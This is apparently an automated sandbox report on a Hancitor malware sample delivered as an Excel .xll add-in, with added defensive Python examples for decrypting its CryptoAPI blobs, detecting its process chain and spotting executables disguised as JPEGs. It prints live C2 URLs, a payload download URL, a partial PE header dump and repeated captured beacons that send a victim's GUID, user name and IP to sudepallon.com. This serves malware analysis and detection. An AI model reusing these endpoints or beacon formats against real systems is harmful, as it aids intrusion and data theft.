Windows Analysis Report 0708_5355150121.xll

Overview

General Information

Sample Name: 0708_5355150121.xll
Analysis ID: 445958
MD5: 41e0318dfdb1c180a375a7efc712649e
SHA1: f0c230010c7b85544c25879d4daf74479360e1bc
SHA256: 73b8c566d8cdf3200daa0b698b9d32a49b1ea8284a1e6aa6408eb9c9daaacb71
Tags: dll xll

Detection

Hancitor
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Detected unpacking (overwrites its own PE header)
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Yara detected Hancitor
C2 URLs / IPs found in malware configuration
Contains functionality to inject threads in other processes
Document exploit detected (process start blacklist hit)
Downloads files with wrong headers with respect to MIME Content-Type
Drops PE files to the user root directory
May check the online IP address of the machine
Powershell drops PE file
Sigma detected: Execution from Suspicious Folder
Sigma detected: MSHTA Spawning Windows Shell
Sigma detected: Microsoft Office Product Spawning Windows Shell
Sigma detected: Mshta Spawning Windows Shell
Abnormal high CPU Usage
Antivirus or Machine Learning detection for unpacked file
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to dynamically determine API calls
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Downloads executable code via HTTP
Drops PE files
Drops PE files to the user directory
Enables debug privileges
Entry point lies outside standard sections
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
PE / OLE file has an invalid certificate
PE file contains sections with non-standard names
PE file contains strange resources
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Searches for the Microsoft Outlook file path
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match

Classification

AV Detection:

Found malware configuration
Source: 00000010.00000003.437644933.00000000012F0000.00000040.00000001.sdmp Malware Configuration Extractor: Hancitor {"Campaign Id": "0707in2_wvcr", "C2 list": ["http://sudepallon.com/8/forum.php", "http://anspossthrly.ru/8/forum.php", "http://thentabecon.ru/8/forum.php"]}
Multi AV Scanner detection for submitted file
Source: 0708_5355150121.xll Virustotal: Detection: 23%
Source: 0708_5355150121.xll ReversingLabs: Detection: 17%
Antivirus or Machine Learning detection for unpacked file
Source: 16.2.snd32sys.exe.610000.0.unpack Avira: Label: TR/Dropper.Gen

Location Tracking:

Yara detected Hancitor
Source: Yara match File source: 16.3.snd32sys.exe.12f4305.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 16.3.snd32sys.exe.12f4305.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 16.2.snd32sys.exe.610000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000010.00000002.486399700.0000000000614000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000010.00000003.437644933.00000000012F0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: snd32sys.exe PID: 2160, type: MEMORY

Cryptography:

Uses Microsoft's Enhanced Cryptographic Provider
Source: C:\Users\Public\snd32sys.exe Code function: 16_2_00612CB0 CryptAcquireContextA,CryptCreateHash,CryptHashData,CryptDeriveKey,CryptDecrypt,CryptDestroyHash,CryptDestroyKey,CryptReleaseContext, 16_2_00612CB0
Source: C:\Users\Public\snd32sys.exe Code function: 16_2_00612CF7 CryptDestroyHash,CryptDestroyKey,CryptReleaseContext, 16_2_00612CF7
Source: C:\Users\Public\snd32sys.exe Code function: 16_2_00612D78 CryptDestroyHash,CryptDestroyKey,CryptReleaseContext, 16_2_00612D78
Source: C:\Users\Public\snd32sys.exe Code function: 16_2_00612D58 CryptDestroyHash,CryptDestroyKey,CryptReleaseContext, 16_2_00612D58
Source: C:\Users\Public\snd32sys.exe Code function: 16_2_00612D35 CryptDestroyHash,CryptDestroyKey,CryptReleaseContext, 16_2_00612D35
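The five functions listed for 16_2_00612CB0 are one CryptoAPI sequence: CryptAcquireContextA opens a provider, CryptCreateHash and CryptHashData hash some secret material, CryptDeriveKey turns that hash into a symmetric session key using Microsoft's documented derivation, and CryptDecrypt decrypts a buffer with it. The report records the call chain but not the ALG_ID passed to CryptCreateHash, the cipher passed to CryptDeriveKey, or the key length carried in the upper 16 bits of its dwFlags; those are read off the call arguments at 16_2_00612CB0 under a debugger. Once known, the decryption can be reproduced offline without running the sample. The following is an added example, not code from the report or from the sample: it reimplements the CryptDeriveKey derivation and RC4 in Python and assumes SHA-1 with a 128-bit RC4 key purely for demonstration; the secret and ciphertext are constructed.

```python
import hashlib


def rc4_crypt(key: bytes, data: bytes) -> bytes:
    """RC4 key scheduling plus PRGA; the same call encrypts and decrypts."""
    s = list(range(256))
    j = 0
    for i in range(256):
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    out = bytearray()
    i = j = 0
    for byte in data:
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(byte ^ s[(s[i] + s[j]) & 0xFF])
    return bytes(out)


def crypt_derive_key(hash_name: str, secret: bytes, key_len: int) -> bytes:
    """Key bytes as CryptDeriveKey derives them from a hash object (no CRYPT_CREATE_SALT).

    Microsoft's documented rule: if the key fits in the digest, take its first key_len
    bytes; otherwise XOR the digest into a 64-byte buffer of 0x36 and into one of 0x5C,
    hash both buffers, concatenate the two digests and truncate.
    """
    digest = hashlib.new(hash_name, secret).digest()
    if key_len <= len(digest):
        return digest[:key_len]
    if key_len > 2 * len(digest):
        raise ValueError("CryptDeriveKey cannot produce a key that long from this hash")
    padded = digest.ljust(64, b"\x00")   # zero padding XORs to the bare 0x36 / 0x5C
    inner = hashlib.new(hash_name, bytes(b ^ 0x36 for b in padded)).digest()
    outer = hashlib.new(hash_name, bytes(b ^ 0x5C for b in padded)).digest()
    return (inner + outer)[:key_len]


def decrypt_capi_blob(secret: bytes, blob: bytes, hash_name: str = "sha1",
                      key_bits: int = 128, zero_salt_to_bits: int = 0) -> bytes:
    """CryptCreateHash/CryptHashData -> CryptDeriveKey -> CryptDecrypt, done offline.

    hash_name, key_bits and the cipher (RC4 here) are assumptions; take the real values
    from the ALG_IDs and dwFlags passed at 16_2_00612CB0. zero_salt_to_bits mimics a
    provider that pads a short RC4 key with zero salt bytes before use; 0 = use as derived.
    """
    key = crypt_derive_key(hash_name, secret, key_bits // 8)
    if zero_salt_to_bits:
        key = key.ljust(zero_salt_to_bits // 8, b"\x00")
    return rc4_crypt(key, blob)


# Constructed demo material: neither the secret nor the plaintext comes from the sample.
DEMO_SECRET = b"constructed-demo-secret"
DEMO_PLAINTEXT = b"http://c2.example.invalid/8/forum.php"
DEMO_BLOB = rc4_crypt(crypt_derive_key("sha1", DEMO_SECRET, 16), DEMO_PLAINTEXT)

if __name__ == "__main__":
    print(decrypt_capi_blob(DEMO_SECRET, DEMO_BLOB))
```

When the plain derivation yields garbage for a sample that passes a 40-bit key length, try the same key padded to 128 bits with zero_salt_to_bits: a provider that does not get CRYPT_CREATE_SALT assigns the unused key bits a salt of zero, and some providers feed that zero-padded material to RC4 as the effective key.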

Compliance:

Detected unpacking (overwrites its own PE header)
Source: C:\Users\Public\snd32sys.exe Unpacked PE file: 16.2.snd32sys.exe.610000.0.unpack
Uses 32bit PE files
Source: 0708_5355150121.xll Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL, LINE_NUMS_STRIPPED
Source: Binary string: c:\HighNature\Straightbusy\conditionSurface\Jobhas\industryCountryfeel.pdb source: snd32sys.exe, snd32sys.exe.6.dr
Source: C:\Users\Public\snd32sys.exe Code function: 16_2_0065838E FindFirstFileExW,FindNextFileW,FindClose, 16_2_0065838E
Source: C:\Users\Public\snd32sys.exe Code function: 16_2_00657FD2 FindFirstFileExW, 16_2_00657FD2

Software Vulnerabilities:

Document exploit detected (process start blacklist hit)
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process created: C:\Windows\SysWOW64\mshta.exe
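The process-start blacklist hit is the EXCEL.EXE to mshta.exe edge of the chain, which is also what the three Sigma signatures in the list above key on: an Office product spawning a shell-like binary, mshta.exe spawning one in turn, and a binary executing from a suspicious folder such as C:\Users\Public. The following is an added example, not code from the report or from the Sigma project, of that detection logic run over process-creation events. The events are constructed to mirror the chain recorded here (EXCEL.EXE, then mshta.exe, then powershell.exe, then C:\Users\Public\snd32sys.exe as PID 2160); the parent of powershell.exe is an assumption the report does not state, and the suspicious-folder list is a deliberately small subset.

```python
from dataclasses import dataclass
from typing import Dict, List

OFFICE_APPS = {"excel.exe", "winword.exe", "powerpnt.exe", "outlook.exe", "msaccess.exe"}
SHELL_LIKE = {"cmd.exe", "powershell.exe", "pwsh.exe", "mshta.exe", "wscript.exe",
              "cscript.exe", "rundll32.exe", "regsvr32.exe"}
# Small subset of the folders the Sigma rule lists (assumption, not the rule's full list).
SUSPICIOUS_DIRS = ("c:\\users\\public\\", "c:\\perflogs\\", "c:\\windows\\temp\\")


@dataclass
class ProcessStart:
    """One process-creation event (the fields Sysmon event 1 / 4688 both carry)."""
    pid: int
    image: str          # full path of the new process
    parent_image: str   # full path of the creating process


def _basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def evaluate(ev: ProcessStart) -> List[str]:
    """Return the names of the rules this single event matches."""
    child, parent = _basename(ev.image), _basename(ev.parent_image)
    hits = []
    if parent in OFFICE_APPS and child in SHELL_LIKE:
        hits.append("Microsoft Office Product Spawning Windows Shell")
    if parent == "mshta.exe" and child in SHELL_LIKE:
        hits.append("MSHTA Spawning Windows Shell")
    if ev.image.lower().startswith(SUSPICIOUS_DIRS):
        hits.append("Execution from Suspicious Folder")
    return hits


def scan(events) -> Dict[int, List[str]]:
    """Map PID -> matched rules, keeping only events that matched something."""
    result = {}
    for ev in events:
        hits = evaluate(ev)
        if hits:
            result[ev.pid] = hits
    return result


# Constructed events modelled on the chain in this report.
SAMPLE_EVENTS = [
    ProcessStart(1, r"C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE",
                 r"C:\Windows\explorer.exe"),
    ProcessStart(2, r"C:\Windows\SysWOW64\mshta.exe",
                 r"C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE"),
    ProcessStart(3, r"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe",
                 r"C:\Windows\SysWOW64\mshta.exe"),            # parent is an assumption
    ProcessStart(2160, r"C:\Users\Public\snd32sys.exe",
                 r"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"),
    ProcessStart(5, r"C:\Windows\System32\notepad.exe", r"C:\Windows\explorer.exe"),
]

if __name__ == "__main__":
    for pid, hits in scan(SAMPLE_EVENTS).items():
        print(pid, hits)
```

Each rule fires on a single parent/child edge, so the three hits together, in this order and within seconds of each other, are what distinguish this chain from the occasional legitimate Office add-in that launches a helper.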

Networking:

C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor URLs: http://sudepallon.com/8/forum.php
Source: Malware configuration extractor URLs: http://anspossthrly.ru/8/forum.php
Source: Malware configuration extractor URLs: http://thentabecon.ru/8/forum.php
Downloads files with wrong headers with respect to MIME Content-Type
Source: http Image file has PE prefix: HTTP/1.1 200 OK Server: nginx Date: Thu, 08 Jul 2021 14:30:58 GMT Content-Type: image/jpeg Content-Length: 763392 Connection: keep-alive Last-Modified: Wed, 07 Jul 2021 13:36:32 GMT ETag: "60e5ade0-ba600" Accept-Ranges: bytes Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 81 0c 63 f0 c5 6d 0d a3 c5 6d 0d a3 c5 6d 0d a3 18 92 c2 a3 c4 6d 0d a3 18 92 c0 a3 c6 6d 0d a3 18 92 c3 a3 d1 6d 0d a3 18 92 c6 a3 d3 6d 0d a3 c5 6d 0c a3 a1 6d 0d a3 18 92 df a3 c0 6d 0d a3 18 92 c4 a3 c4 6d 0d a3 18 92 c1 a3 c4 6d 0d a3 52 69 63 68 c5 6d 0d a3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 a3 3c de 60 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0b 00 00 62 07 00 00 ce 0d 00 00 00 00 00 b0 ac 01 00 00 10 00 00 00 80 07 00 00 00 00 01 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 70 15 00 00 04 00 00 57 d6 0b 00 02 00 40 81 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 f8 75 09 00 b4 00 00 00 00 80 13 00 40 93 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 15 00 40 47 00 00 70 39 09 00 54 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c8 39 09 00 40 00 00 00 00 00 00 00 00 00 00 00 00 80 07 00 88 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 17 60 07 00 00 10 00 00 00 62 07 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 50 04 02 00 00 80 07 00 00 06 02 00 00 66 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 c4 ea 09 00 00 90 09 
00 00 5e 00 00 00 6c 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 40 93 01 00 00 80 13 00 00 94 01 00 00 ca 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 40 47 00 00 00 20 15 00 00 48 00 00 00 5e 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
May check the online IP address of the machine
Source: C:\Users\Public\snd32sys.exe DNS query: name: api.ipify.org
Source: C:\Users\Public\snd32sys.exe DNS query: name: api.ipify.org
Source: C:\Users\Public\snd32sys.exe DNS query: name: api.ipify.org
Downloads executable code via HTTP
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OK Server: nginx Date: Thu, 08 Jul 2021 14:30:58 GMT Content-Type: image/jpeg Content-Length: 763392 Connection: keep-alive Last-Modified: Wed, 07 Jul 2021 13:36:32 GMT ETag: "60e5ade0-ba600" Accept-Ranges: bytes Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 ... (the same MZ/PE image dumped in full under "Downloads files with wrong headers with respect to MIME Content-Type" above)
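The response served for /08.jpg declares image/jpeg but starts with an MZ header, and the dumped bytes carry a full PE header: e_lfanew points at 0xE8, the COFF header gives Machine 0x014c and five sections, and the section table ends with .reloc whose raw data finishes at 0xb5e00 + 0x4800 = 0xba600 = 763392, exactly the Content-Length (and the ETag's second half). The following is an added example, not code from the report or from the sample, that performs both checks: it sniffs the real type from magic bytes and, for a PE, parses the header far enough to confirm the download is a complete executable rather than an image with something appended. The input is the leading 0x2A8 bytes transcribed from the dump above; the DOS stub and Rich header between 0x40 and 0xE7 are zero-filled to keep the listing short, which no parsed field depends on.

```python
import struct
from datetime import datetime, timezone

# Response headers recorded for GET /08.jpg.
RESPONSE_HEADERS = {"Content-Type": "image/jpeg", "Content-Length": "763392"}

# Leading 0x2A8 bytes of that response, transcribed from the report's "Data Raw" dump.
# DOS stub and Rich header (0x40-0xE7) zero-filled; e_lfanew at 0x3C still says 0xE8.
_DOS_HEADER = ("4d5a90000300000004000000ffff0000" "b8000000000000004000000000000000"
               "00000000000000000000000000000000" "000000000000000000000000e8000000")
_COFF_HEADER = "504500004c010500a33cde600000000000000000e0000201"
_OPTIONAL_HEADER = (
    "0b010b000062070000ce0d0000000000" "b0ac0100001000000080070000000001"
    "00100000000200000600000000000000" "06000000000000000070150000040000"
    "57d60b00020040810000100000100000" "00001000001000000000000010000000"
    "0000000000000000f8750900b4000000" "00801300409301000000000000000000"
    "00000000000000000020150040470000" "70390900540000000000000000000000"
    "00000000000000000000000000000000" "c8390900400000000000000000000000"
    "00800700880200000000000000000000" "00000000000000000000000000000000")
# name (8 bytes)    vsize      va         rawsize    rawptr     reloc/line ptrs+counts     chars
_SECTION_TABLE = (
    "2e74657874000000" "17600700" "00100000" "00620700" "00040000" "000000000000000000000000" "20000060"
    "2e72646174610000" "50040200" "00800700" "00060200" "00660700" "000000000000000000000000" "40000040"
    "2e64617461000000" "c4ea0900" "00900900" "005e0000" "006c0900" "000000000000000000000000" "400000c0"
    "2e72737263000000" "40930100" "00801300" "00940100" "00ca0900" "000000000000000000000000" "40000040"
    "2e72656c6f630000" "40470000" "00201500" "00480000" "005e0b00" "000000000000000000000000" "40000042")
BODY = (bytes.fromhex(_DOS_HEADER) + bytes(0xE8 - 0x40)
        + bytes.fromhex(_COFF_HEADER + _OPTIONAL_HEADER + _SECTION_TABLE))


def sniff_type(data: bytes) -> str:
    """Media type implied by magic bytes, ignoring what the server declared."""
    if data[:2] == b"MZ" and len(data) >= 0x40:
        e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
        if data[e_lfanew:e_lfanew + 4] == b"PE\x00\x00":
            return "application/vnd.microsoft.portable-executable"
        return "application/x-msdownload"
    if data[:3] == b"\xff\xd8\xff":
        return "image/jpeg"
    if data[:8] == b"\x89PNG\r\n\x1a\n":
        return "image/png"
    return "application/octet-stream"


def parse_pe(data: bytes) -> dict:
    """COFF header, the optional-header fields used below, and the section table."""
    pe = struct.unpack_from("<I", data, 0x3C)[0]
    sig, machine, nsec, stamp, _symtab, _nsyms, opt_size, chars = struct.unpack_from(
        "<4sHHIIIHH", data, pe)
    if sig != b"PE\x00\x00":
        raise ValueError("PE signature missing")
    magic, = struct.unpack_from("<H", data, pe + 24)
    entry, = struct.unpack_from("<I", data, pe + 24 + 16)   # AddressOfEntryPoint
    sections, off = [], pe + 24 + opt_size
    for _ in range(nsec):
        name, vsize, va, rsize, rptr = struct.unpack_from("<8sIIII", data, off)
        sections.append({"name": name.rstrip(b"\x00").decode("ascii"), "vsize": vsize,
                         "va": va, "raw_size": rsize, "raw_ptr": rptr})
        off += 40
    return {"machine": machine, "num_sections": nsec, "timestamp": stamp,
            "compiled_utc": datetime.fromtimestamp(stamp, timezone.utc).isoformat(),
            "magic": magic, "characteristics": chars, "entry_point": entry,
            "sections": sections}


def section_for_rva(pe: dict, rva: int):
    for s in pe["sections"]:
        if s["va"] <= rva < s["va"] + max(s["vsize"], s["raw_size"]):
            return s["name"]
    return None


def file_size_from_sections(pe: dict) -> int:
    """Offset where the last section's raw data ends: the size of an unappended PE."""
    return max(s["raw_ptr"] + s["raw_size"] for s in pe["sections"])


def check_download(headers: dict, body: bytes) -> dict:
    """Compare declared and sniffed types; for a PE, test whether the body is complete."""
    declared = headers.get("Content-Type", "").split(";")[0].strip().lower()
    sniffed = sniff_type(body)
    result = {"declared": declared, "sniffed": sniffed, "mismatch": declared != sniffed,
              "pe": None, "complete_pe": False, "entry_section": None}
    if sniffed.endswith("portable-executable"):
        pe = parse_pe(body)
        result["pe"] = pe
        result["complete_pe"] = file_size_from_sections(pe) == int(headers["Content-Length"])
        result["entry_section"] = section_for_rva(pe, pe["entry_point"])
    return result


if __name__ == "__main__":
    print(check_download(RESPONSE_HEADERS, BODY))
```

The same parse shows this payload is an EXE (Characteristics 0x0102, no DLL bit) whose entry point 0x1acb0 sits inside .text, unlike the submitted .xll, whose static information above flags it as a DLL with an entry point outside the standard sections.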
HTTP GET or POST without a user agent
Source: global traffic HTTP traffic detected: GET /92375234.xml HTTP/1.1 Connection: Keep-Alive Host: srand04rf.ru
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 23.21.173.155
Source: Joe Sandbox View IP Address: 77.222.42.67
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: SWEB-ASRU
Uses a known web browser user agent for HTTP communication
Source: global traffic HTTP traffic detected: GET /08.jpg HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.17134.1 Host: srand04rf.ru Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1 Accept: */* User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko Host: api.ipify.org Cache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: sudepallon.comContent-Length: 122Cache-Control: no-cacheData Raw: 47 55 49 44 3d 38 30 32 33 32 32 38 38 33 33 36 37 32 37 32 31 36 34 34 26 42 55 49 4c 44 3d 30 37 30 37 69 6e 32 5f 77 76 63 72 26 49 4e 46 4f 3d 38 38 38 36 38 33 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 68 61 72 64 7a 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 32 28 78 36 34 29 Data Ascii: GUID=8023228833672721644&BUILD=0707in2_wvcr&INFO=888683 @ computer\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=6.2(x64)
Source: global traffic HTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: sudepallon.comContent-Length: 122Cache-Control: no-cacheData Raw: 47 55 49 44 3d 38 30 32 33 32 32 38 38 33 33 36 37 32 37 32 31 36 34 34 26 42 55 49 4c 44 3d 30 37 30 37 69 6e 32 5f 77 76 63 72 26 49 4e 46 4f 3d 38 38 38 36 38 33 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 68 61 72 64 7a 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 32 28 78 36 34 29 Data Ascii: GUID=8023228833672721644&BUILD=0707in2_wvcr&INFO=888683 @ computer\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=6.2(x64)
Source: global traffic HTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: sudepallon.comContent-Length: 122Cache-Control: no-cacheData Raw: 47 55 49 44 3d 38 30 32 33 32 32 38 38 33 33 36 37 32 37 32 31 36 34 34 26 42 55 49 4c 44 3d 30 37 30 37 69 6e 32 5f 77 76 63 72 26 49 4e 46 4f 3d 38 38 38 36 38 33 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 68 61 72 64 7a 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 32 28 78 36 34 29 Data Ascii: GUID=8023228833672721644&BUILD=0707in2_wvcr&INFO=888683 @ computer\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=6.2(x64)
Source: global traffic HTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: sudepallon.comContent-Length: 122Cache-Control: no-cacheData Raw: 47 55 49 44 3d 38 30 32 33 32 32 38 38 33 33 36 37 32 37 32 31 36 34 34 26 42 55 49 4c 44 3d 30 37 30 37 69 6e 32 5f 77 76 63 72 26 49 4e 46 4f 3d 38 38 38 36 38 33 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 68 61 72 64 7a 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 32 28 78 36 34 29 Data Ascii: GUID=8023228833672721644&BUILD=0707in2_wvcr&INFO=888683 @ computer\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=6.2(x64)
Source: global traffic HTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: sudepallon.comContent-Length: 122Cache-Control: no-cacheData Raw: 47 55 49 44 3d 38 30 32 33 32 32 38 38 33 33 36 37 32 37 32 31 36 34 34 26 42 55 49 4c 44 3d 30 37 30 37 69 6e 32 5f 77 76 63 72 26 49 4e 46 4f 3d 38 38 38 36 38 33 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 68 61 72 64 7a 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 32 28 78 36 34 29 Data Ascii: GUID=8023228833672721644&BUILD=0707in2_wvcr&INFO=888683 @ computer\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=6.2(x64)
Source: global traffic HTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: sudepallon.comContent-Length: 122Cache-Control: no-cacheData Raw: 47 55 49 44 3d 38 30 32 33 32 32 38 38 33 33 36 37 32 37 32 31 36 34 34 26 42 55 49 4c 44 3d 30 37 30 37 69 6e 32 5f 77 76 63 72 26 49 4e 46 4f 3d 38 38 38 36 38 33 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 68 61 72 64 7a 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 32 28 78 36 34 29 Data Ascii: GUID=8023228833672721644&BUILD=0707in2_wvcr&INFO=888683 @ computer\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=6.2(x64)
Source: global traffic HTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: sudepallon.comContent-Length: 122Cache-Control: no-cacheData Raw: 47 55 49 44 3d 38 30 32 33 32 32 38 38 33 33 36 37 32 37 32 31 36 34 34 26 42 55 49 4c 44 3d 30 37 30 37 69 6e 32 5f 77 76 63 72 26 49 4e 46 4f 3d 38 38 38 36 38 33 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 68 61 72 64 7a 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 32 28 78 36 34 29 Data Ascii: GUID=8023228833672721644&BUILD=0707in2_wvcr&INFO=888683 @ computer\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=6.2(x64)
